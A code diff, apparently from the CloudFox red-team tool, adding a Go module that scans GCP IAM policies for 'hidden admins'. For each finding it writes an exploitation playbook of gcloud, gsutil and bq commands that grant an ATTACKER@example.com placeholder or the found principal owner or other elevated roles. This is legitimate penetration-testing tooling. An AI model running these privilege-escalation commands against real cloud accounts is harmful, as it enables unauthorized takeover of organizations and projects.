formatAuthorizedCIDRs(cluster) + + clusterBody = append(clusterBody, []string{ + m.GetProjectName(cluster.ProjectID), cluster.Name, cluster.Location, + clusterMode, cluster.Status, cluster.CurrentMasterVersion, releaseChannel, + endpoint, shared.BoolToYesNo(cluster.PrivateCluster), authorizedCIDRs, + shared.BoolToYesNo(cluster.WorkloadIdentity != ""), shared.BoolToYesNo(cluster.NetworkPolicy), + shared.BoolToYesNo(cluster.BinaryAuthorization), + }) + } + + if len(clusterBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, + }) + } + + // Node pools table - node-level details including hardware security (like instances module) + nodePoolHeader := []string{ + "Project", "Cluster", "Node Pool", "Machine Type", "Node Count", + "Auto Upgrade", "Secure Boot", "Integrity", "Preemptible", + "Service Account", "SA Attack Paths", "SA Scopes", "SA Scope Summary", + } + + var nodePoolBody [][]string + for _, np := range nodePools { + saDisplay := np.ServiceAccount + if saDisplay == "" { + saDisplay = "-" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if saDisplay != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saDisplay) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // Format actual scopes for display + scopes := formatGKEScopes(np.OAuthScopes) + + // Get scope summary, default to "Unknown" if empty + scopeSummary := np.ScopeSummary + if scopeSummary == "" { + scopeSummary = "Unknown" + } + + nodePoolBody = append(nodePoolBody, []string{ + m.GetProjectName(np.ProjectID), np.ClusterName, np.Name, + np.MachineType, fmt.Sprintf("%d", np.NodeCount), + shared.BoolToYesNo(np.AutoUpgrade), + shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.IntegrityMonitoring), + shared.BoolToYesNo(np.Preemptible || np.Spot), + saDisplay, attackPaths, scopes, scopeSummary, + }) + } + + if len(nodePoolBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-node-pools", + Header: nodePoolHeader, + Body: nodePoolBody, + }) + } + + return tableFiles +} + +// formatAuthorizedCIDRs formats the authorized CIDRs for display +func formatAuthorizedCIDRs(cluster GKEService.ClusterInfo) string { + if cluster.PrivateCluster { + return "Private endpoint" + } + if !cluster.MasterAuthorizedOnly { + return "0.0.0.0/0 (any)" + } + if len(cluster.MasterAuthorizedCIDRs) == 0 { + return "None configured" + } + // Check if 0.0.0.0/0 is in the list (effectively public) + for _, cidr := range cluster.MasterAuthorizedCIDRs { + if cidr == "0.0.0.0/0" { + return "0.0.0.0/0 (any)" + } + } + // Show all CIDRs + return strings.Join(cluster.MasterAuthorizedCIDRs, ", ") +} + +// formatGKEScopes formats OAuth scopes for display (extracts short names from URLs) +func formatGKEScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + // e.g., "https://www.googleapis.com/auth/cloud-platform" -> "cloud-platform" + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go new file mode 100755 index 00000000..ea340048 --- /dev/null +++ b/gcp/commands/hiddenadmins.go @@ -0,0 +1,966 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iampb "cloud.google.com/go/iam/apiv1/iampb" + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" +) + +var GCPHiddenAdminsCommand = &cobra.Command{ + Use: globals.GCP_HIDDEN_ADMINS_MODULE_NAME, + Aliases: []string{"ha", "hidden"}, + Short: "Identify principals who can modify IAM policies (hidden admins)", + Long: `Analyze GCP IAM policies to identify principals who can modify IAM bindings. + +This module finds "hidden admins" - principals who may not have obvious admin roles +but possess permissions to grant themselves or others elevated access. + +Detected IAM modification capabilities: + +Organization Level: +- resourcemanager.organizations.setIamPolicy - Modify org-wide IAM +- iam.roles.create/update at org level - Create/modify org custom roles + +Folder Level: +- resourcemanager.folders.setIamPolicy - Modify folder IAM (affects all children) + +Project Level: +- resourcemanager.projects.setIamPolicy - Modify project IAM +- iam.roles.create/update - Create/modify project custom roles + +Service Account Level: +- iam.serviceAccounts.setIamPolicy - Grant SA access to others +- iam.serviceAccounts.create + setIamPolicy combo + +Resource Level IAM: +- storage.buckets.setIamPolicy - Modify bucket IAM +- bigquery.datasets.setIamPolicy - Modify dataset IAM +- pubsub.topics/subscriptions.setIamPolicy - Modify Pub/Sub IAM +- secretmanager.secrets.setIamPolicy - Modify secret IAM +- compute.instances.setIamPolicy - Modify instance IAM +- cloudfunctions.functions.setIamPolicy - Modify function IAM +- run.services.setIamPolicy - Modify Cloud Run IAM +- artifactregistry.repositories.setIamPolicy - Modify registry IAM`, + Run: runGCPHiddenAdminsCommand, +} + +// IAMModificationPermission represents a permission that allows IAM policy modification +type IAMModificationPermission struct { + Permission string + Category string + Description string +} + +// HiddenAdmin represents a principal with IAM modification capabilities +type HiddenAdmin struct { + Principal string + PrincipalType string + Permission string + Category string + Description string + ScopeType string // organization, folder, project, resource + ScopeID string + ScopeName string + ExploitCommand string +} + +type HiddenAdminsModule struct { + gcpinternal.BaseGCPModule + + AllAdmins []HiddenAdmin + OrgAdmins []HiddenAdmin + FolderAdmins []HiddenAdmin + ProjectAdmins map[string][]HiddenAdmin // projectID -> admins + ResourceAdmins []HiddenAdmin + + // FoxMapper-based wrong admins + WrongAdmins []foxmapperservice.WrongAdminFinding + FoxMapperCache *gcpinternal.FoxMapperCache + + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + + OrgIDs []string + OrgNames map[string]string + FolderNames map[string]string + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type HiddenAdminsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o HiddenAdminsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o HiddenAdminsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPHiddenAdminsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + if err != nil { + return + } + + module := &HiddenAdminsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AllAdmins: []HiddenAdmin{}, + OrgAdmins: []HiddenAdmin{}, + FolderAdmins: []HiddenAdmin{}, + ProjectAdmins: make(map[string][]HiddenAdmin), + ResourceAdmins: []HiddenAdmin{}, + OrgIDs: []string{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), + LootMap: make(map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// GetIAMModificationPermissions returns permissions that allow IAM policy modification +func GetIAMModificationPermissions() []IAMModificationPermission { + return []IAMModificationPermission{ + // Organization-level IAM + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "Org IAM", Description: "Modify organization-wide IAM policy"}, + + // Folder-level IAM + {Permission: "resourcemanager.folders.setIamPolicy", Category: "Folder IAM", Description: "Modify folder IAM policy (affects all children)"}, + + // Project-level IAM + {Permission: "resourcemanager.projects.setIamPolicy", Category: "Project IAM", Description: "Modify project IAM policy"}, + + // Custom Role Management + {Permission: "iam.roles.create", Category: "Custom Roles", Description: "Create custom IAM roles"}, + {Permission: "iam.roles.update", Category: "Custom Roles", Description: "Modify custom IAM role permissions"}, + + // Service Account IAM + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "SA IAM", Description: "Grant access to service accounts"}, + + // Org Policy (can disable security constraints) + {Permission: "orgpolicy.policy.set", Category: "Org Policy", Description: "Modify organization policies"}, + + // Resource-specific IAM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage IAM", Description: "Modify bucket IAM policy"}, + {Permission: "bigquery.datasets.setIamPolicy", Category: "BigQuery IAM", Description: "Modify dataset IAM policy"}, + {Permission: "pubsub.topics.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify topic IAM policy"}, + {Permission: "pubsub.subscriptions.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify subscription IAM policy"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets IAM", Description: "Modify secret IAM policy"}, + {Permission: "compute.instances.setIamPolicy", Category: "Compute IAM", Description: "Modify instance IAM policy"}, + {Permission: "compute.images.setIamPolicy", Category: "Compute IAM", Description: "Modify image IAM policy"}, + {Permission: "compute.snapshots.setIamPolicy", Category: "Compute IAM", Description: "Modify snapshot IAM policy"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Functions IAM", Description: "Modify function IAM policy"}, + {Permission: "run.services.setIamPolicy", Category: "Cloud Run IAM", Description: "Modify Cloud Run service IAM policy"}, + {Permission: "artifactregistry.repositories.setIamPolicy", Category: "Artifact Registry IAM", Description: "Modify repository IAM policy"}, + {Permission: "cloudkms.cryptoKeys.setIamPolicy", Category: "KMS IAM", Description: "Modify KMS key IAM policy"}, + } +} + +func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing IAM policies to identify hidden admins...", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Try to load FoxMapper data for wrongadmin analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // Use FoxMapper wrongadmin analysis if available + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + svc := m.FoxMapperCache.GetService() + m.WrongAdmins = svc.AnalyzeWrongAdmins() + if len(m.WrongAdmins) > 0 { + logger.InfoM(fmt.Sprintf("FoxMapper found %d 'wrong admins' (admins without explicit roles/owner)", len(m.WrongAdmins)), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + } + + // Build permission map + permMap := make(map[string]IAMModificationPermission) + for _, p := range GetIAMModificationPermissions() { + permMap[p.Permission] = p + } + + // Analyze organization-level IAM + m.analyzeOrganizationIAM(ctx, logger, permMap) + + // Analyze folder-level IAM + m.analyzeFolderIAM(ctx, logger, permMap) + + // Analyze project-level IAM for each project + for _, projectID := range m.ProjectIDs { + m.analyzeProjectIAM(ctx, logger, projectID, permMap) + } + + // Generate loot (playbook) + m.generateLoot() + + if len(m.AllAdmins) == 0 && len(m.WrongAdmins) == 0 { + logger.InfoM("No hidden admins found", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + return + } + + // Count by scope type + orgCount := len(m.OrgAdmins) + folderCount := len(m.FolderAdmins) + projectCount := 0 + for _, admins := range m.ProjectAdmins { + projectCount += len(admins) + } + resourceCount := len(m.ResourceAdmins) + + if len(m.AllAdmins) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d hidden admin(s) with IAM modification permissions: %d org-level, %d folder-level, %d project-level, %d resource-level", + len(m.AllAdmins), orgCount, folderCount, projectCount, resourceCount), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + + if len(m.WrongAdmins) > 0 { + // Count by admin level + orgWrong := 0 + folderWrong := 0 + projectWrong := 0 + for _, wa := range m.WrongAdmins { + switch wa.AdminLevel { + case "org": + orgWrong++ + case "folder": + folderWrong++ + default: + projectWrong++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d 'wrong admins' (FoxMapper): %d org-level, %d folder-level, %d project-level", + len(m.WrongAdmins), orgWrong, folderWrong, projectWrong), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *HiddenAdminsModule) analyzeOrganizationIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + orgsClient, err := resourcemanager.NewOrganizationsClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create organizations client") + } + return + } + defer orgsClient.Close() + + // Get IAM service for role resolution + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.OrgNames[orgID] = org.DisplayName + m.OrgIDs = append(m.OrgIDs, orgID) + + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "organization", orgID, org.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeFolderIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + foldersClient, err := resourcemanager.NewFoldersClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create folders client") + } + return + } + defer foldersClient.Close() + + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.FolderNames[folderID] = folder.DisplayName + + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "folder", folderID, folder.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeProjectIAM(ctx context.Context, logger internal.Logger, projectID string, permMap map[string]IAMModificationPermission) { + crmService, err := crmv1.NewService(ctx) + if err != nil { + return + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() + if err != nil { + return + } + + iamService, _ := m.getIAMService(ctx) + projectName := m.GetProjectName(projectID) + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + permissions := m.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "project", projectID, projectName) + } + } +} + +func (m *HiddenAdminsModule) checkForHiddenAdmins(member string, permissions []string, permMap map[string]IAMModificationPermission, scopeType, scopeID, scopeName string) { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return + } + + principalType := extractPrincipalType(member) + principal := extractPrincipalEmail(member) + + for _, perm := range permissions { + if iamPerm, ok := permMap[perm]; ok { + admin := HiddenAdmin{ + Principal: principal, + PrincipalType: principalType, + Permission: perm, + Category: iamPerm.Category, + Description: iamPerm.Description, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + ExploitCommand: m.generateExploitCommand(perm, scopeType, scopeID), + } + + m.mu.Lock() + m.AllAdmins = append(m.AllAdmins, admin) + switch scopeType { + case "organization": + m.OrgAdmins = append(m.OrgAdmins, admin) + case "folder": + m.FolderAdmins = append(m.FolderAdmins, admin) + case "project": + m.ProjectAdmins[scopeID] = append(m.ProjectAdmins[scopeID], admin) + case "resource": + m.ResourceAdmins = append(m.ResourceAdmins, admin) + } + m.mu.Unlock() + } + } +} + +func (m *HiddenAdminsModule) generateExploitCommand(permission, scopeType, scopeID string) string { + switch permission { + case "resourcemanager.organizations.setIamPolicy": + return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.folders.setIamPolicy": + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.projects.setIamPolicy": + return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "iam.roles.create": + return fmt.Sprintf("gcloud iam roles create customAdmin --project=%s --permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.roles.update": + return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.serviceAccounts.setIamPolicy": + return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding SA@%s.iam.gserviceaccount.com --member='user:ATTACKER@example.com' --role='roles/iam.serviceAccountTokenCreator'", scopeID) + case "orgpolicy.policy.set": + return "# Disable org policy constraints to bypass security controls" + case "storage.buckets.setIamPolicy": + return "gsutil iam ch user:ATTACKER@example.com:objectViewer gs://BUCKET_NAME" + case "bigquery.datasets.setIamPolicy": + return fmt.Sprintf("bq add-iam-policy-binding --member='user:ATTACKER@example.com' --role='roles/bigquery.dataViewer' %s:DATASET", scopeID) + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} + +func (m *HiddenAdminsModule) getIAMService(ctx context.Context) (*iam.Service, error) { + return iam.NewService(ctx) +} + +func (m *HiddenAdminsModule) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + return m.getKnownRolePermissions(role) + } + + return roleInfo.IncludedPermissions +} + +func (m *HiddenAdminsModule) getKnownRolePermissions(role string) []string { + knownRoles := map[string][]string{ + "roles/owner": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + "iam.roles.create", + "iam.roles.update", + "storage.buckets.setIamPolicy", + "bigquery.datasets.setIamPolicy", + }, + "roles/resourcemanager.organizationAdmin": { + "resourcemanager.organizations.setIamPolicy", + }, + "roles/resourcemanager.folderAdmin": { + "resourcemanager.folders.setIamPolicy", + }, + "roles/resourcemanager.projectIamAdmin": { + "resourcemanager.projects.setIamPolicy", + }, + "roles/iam.securityAdmin": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.roleAdmin": { + "iam.roles.create", + "iam.roles.update", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + return []string{} +} + +func (m *HiddenAdminsModule) generateLoot() { + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput +} + +func (m *HiddenAdminsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *HiddenAdminsModule) getHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Principal", + "Principal Type", + "Permission", + "Category", + } +} + +func (m *HiddenAdminsModule) adminsToTableBody(admins []HiddenAdmin) [][]string { + var body [][]string + for _, admin := range admins { + scopeName := admin.ScopeName + if scopeName == "" { + scopeName = admin.ScopeID + } + + body = append(body, []string{ + admin.ScopeType, + admin.ScopeID, + scopeName, + admin.Principal, + admin.PrincipalType, + admin.Permission, + admin.Category, + }) + } + return body +} + +// adminsForProject returns hidden admins filtered for a specific project +// Includes: +// - Project-scoped findings where ScopeID matches this project +// - Org-scoped findings where the org is this project's org +// - Folder-scoped findings where the folder is in this project's ancestry path +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) adminsForProject(projectID string) []HiddenAdmin { + var filtered []HiddenAdmin + + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + for _, admin := range m.AllAdmins { + // Check if principal is relevant for this project + principalProject := extractProjectFromPrincipal(admin.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" + + if !principalRelevant { + continue + } + + switch admin.ScopeType { + case "project": + // Project-scoped: must match this project + if admin.ScopeID == projectID { + filtered = append(filtered, admin) + } + case "organization": + // Org-scoped: must be this project's org + if projectOrgID != "" && admin.ScopeID == projectOrgID { + filtered = append(filtered, admin) + } else if projectOrgID == "" { + // No org info, include all org findings for users/groups + filtered = append(filtered, admin) + } + case "folder": + // Folder-scoped: must be in this project's ancestry + if len(ancestorFolderSet) > 0 { + if ancestorFolderSet[admin.ScopeID] { + filtered = append(filtered, admin) + } + } else { + // No ancestry info, include all folder findings for users/groups + filtered = append(filtered, admin) + } + default: + // Resource-level: include if principal is relevant + filtered = append(filtered, admin) + } + } + + return filtered +} + +// adminsToTableBodyForProject returns table body filtered for a specific project +func (m *HiddenAdminsModule) adminsToTableBodyForProject(projectID string) [][]string { + admins := m.adminsForProject(projectID) + return m.adminsToTableBody(admins) +} + +// wrongAdminsForProject returns wrong admins filtered for a specific project +// Includes: +// - Project-level wrong admins where ProjectID matches this project +// - Org-level wrong admins where OrgID matches this project's org +// - Folder-level wrong admins where FolderID is in this project's ancestry +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) wrongAdminsForProject(projectID string) []foxmapperservice.WrongAdminFinding { + var filtered []foxmapperservice.WrongAdminFinding + + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + for _, wa := range m.WrongAdmins { + principalProject := extractProjectFromPrincipal(wa.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" + + if !principalRelevant { + continue + } + + switch wa.AdminLevel { + case "project": + // Project-level: include if ProjectID matches this project + if wa.ProjectID == projectID { + filtered = append(filtered, wa) + } + case "org": + // Org-level: must be this project's org + if projectOrgID != "" && wa.OrgID == projectOrgID { + filtered = append(filtered, wa) + } else if projectOrgID == "" { + // No org info available, include all org findings for relevant principals + filtered = append(filtered, wa) + } + case "folder": + // Folder-level: must be in this project's ancestry + if len(ancestorFolderSet) > 0 && wa.FolderID != "" { + if ancestorFolderSet[wa.FolderID] { + filtered = append(filtered, wa) + } + } else if len(ancestorFolderSet) == 0 { + // No ancestry info available, include all folder findings for relevant principals + filtered = append(filtered, wa) + } + default: + // Unknown level, include for relevant principals if ProjectID matches + if wa.ProjectID == projectID || wa.ProjectID == "" { + filtered = append(filtered, wa) + } + } + } + + return filtered +} + +// wrongAdminsToTableBodyForProject returns wrong admins table body for a project +func (m *HiddenAdminsModule) wrongAdminsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, wa := range m.wrongAdminsForProject(projectID) { + reasonsStr := strings.Join(wa.Reasons, "; ") + + displayProject := wa.ProjectID + if displayProject == "" { + displayProject = "-" + } + + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + displayProject, + reasonsStr, + }) + } + return body +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *internal.LootFile { + admins := m.adminsForProject(projectID) + wrongAdmins := m.wrongAdminsForProject(projectID) + + if len(admins) == 0 && len(wrongAdmins) == 0 { + return nil + } + + var sb strings.Builder + sb.WriteString("# GCP Hidden Admins Exploitation Playbook\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Add wrong admins section if available + if len(wrongAdmins) > 0 { + sb.WriteString("# === WRONG ADMINS (FOXMAPPER ANALYSIS) ===\n\n") + sb.WriteString("# These principals are marked as admin but don't have explicit admin roles.\n\n") + + for _, wa := range wrongAdmins { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", wa.Principal, wa.MemberType)) + sb.WriteString(fmt.Sprintf("Admin Level: %s\n", wa.AdminLevel)) + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + + // Add exploit command based on admin level + switch wa.AdminLevel { + case "org": + sb.WriteString("\n# Grant yourself org-level owner:\n") + orgID := wa.OrgID + if orgID == "" { + orgID = "ORG_ID" + } + sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", orgID, wa.MemberType, wa.Principal)) + case "folder": + sb.WriteString("\n# Grant yourself folder-level owner:\n") + folderID := wa.FolderID + if folderID == "" { + folderID = "FOLDER_ID" + } + sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", folderID, wa.MemberType, wa.Principal)) + default: + sb.WriteString("\n# Grant yourself project-level owner:\n") + targetProject := wa.ProjectID + if targetProject == "" { + targetProject = projectID + } + sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", targetProject, wa.MemberType, wa.Principal)) + } + } + } + + // Add hidden admins section + if len(admins) > 0 { + sb.WriteString("# === HIDDEN ADMINS (IAM MODIFICATION CAPABILITIES) ===\n\n") + + for _, admin := range admins { + scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) + if admin.ScopeName == "" { + scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) + } + + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", admin.Principal, admin.PrincipalType)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", admin.Permission)) + sb.WriteString(fmt.Sprintf("Category: %s\n", admin.Category)) + sb.WriteString(fmt.Sprintf("Scope: %s\n", scopeInfo)) + sb.WriteString("\n") + sb.WriteString(admin.ExploitCommand) + sb.WriteString("\n\n") + } + } + + return &internal.LootFile{ + Name: "hidden-admins-commands", + Contents: sb.String(), + } +} + +func (m *HiddenAdminsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + // Hidden admins table + body := m.adminsToTableBodyForProject(projectID) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "hidden-admins", + Header: m.getHeader(), + Body: body, + }) + } + + // Wrong admins table + wrongBody := m.wrongAdminsToTableBodyForProject(projectID) + if len(wrongBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: wrongBody, + }) + } + + return tableFiles +} + +func (m *HiddenAdminsModule) buildAllTables() []internal.TableFile { + var tables []internal.TableFile + + if len(m.AllAdmins) > 0 { + tables = append(tables, internal.TableFile{ + Name: "hidden-admins", + Header: m.getHeader(), + Body: m.adminsToTableBody(m.AllAdmins), + }) + } + + // Add wrong admins table if FoxMapper data is available + if len(m.WrongAdmins) > 0 { + tables = append(tables, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: m.wrongAdminsToTableBody(), + }) + } + + return tables +} + +func (m *HiddenAdminsModule) getWrongAdminsHeader() []string { + return []string{ + "Principal", + "Type", + "Admin Level", + "Project", + "Reasons", + } +} + +func (m *HiddenAdminsModule) wrongAdminsToTableBody() [][]string { + var body [][]string + for _, wa := range m.WrongAdmins { + // Combine reasons into a single string + reasonsStr := strings.Join(wa.Reasons, "; ") + + projectID := wa.ProjectID + if projectID == "" { + projectID = "-" + } + + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + projectID, + reasonsStr, + }) + } + return body +} + + +func (m *HiddenAdminsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + // Build tables for this project + 